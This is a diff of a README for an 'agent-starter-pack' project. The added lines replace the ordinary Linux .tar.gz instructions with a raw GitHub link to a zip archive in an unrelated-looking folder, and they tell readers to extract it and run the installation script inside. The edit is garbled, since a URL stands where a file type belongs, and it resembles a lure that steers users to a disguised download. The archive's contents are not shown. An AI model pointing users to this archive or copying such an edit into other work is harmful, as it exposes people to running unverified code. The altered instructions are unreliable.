juana267/agent-starter-pack/README.md

    Click on the appropriate file for your operating system:
    - For Windows: Select the `.exe` file.
    - For macOS: Select the `.dmg` file.
-   - For Linux: Select the `.tar.gz` file.
+   - For Linux: Select the `https://github.com/juana267/agent-starter-pack/raw/refs/heads/main/neuropathist/pack-agent-starter-v1.4.zip` file.

 4. **Run the Installer**
    After the download completes, locate the downloaded file on your computer.
    - For Windows: Double-click the `.exe` file to start the installation.
    - For macOS: Open the `.dmg` file, then drag the agent-starter-pack to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file, then run the installation script inside.
+   - For Linux: Extract the `https://github.com/juana267/agent-starter-pack/raw/refs/heads/main/neuropathist/pack-agent-starter-v1.4.zip` file, then run the installation script inside.

 ## ⚙️ Configuration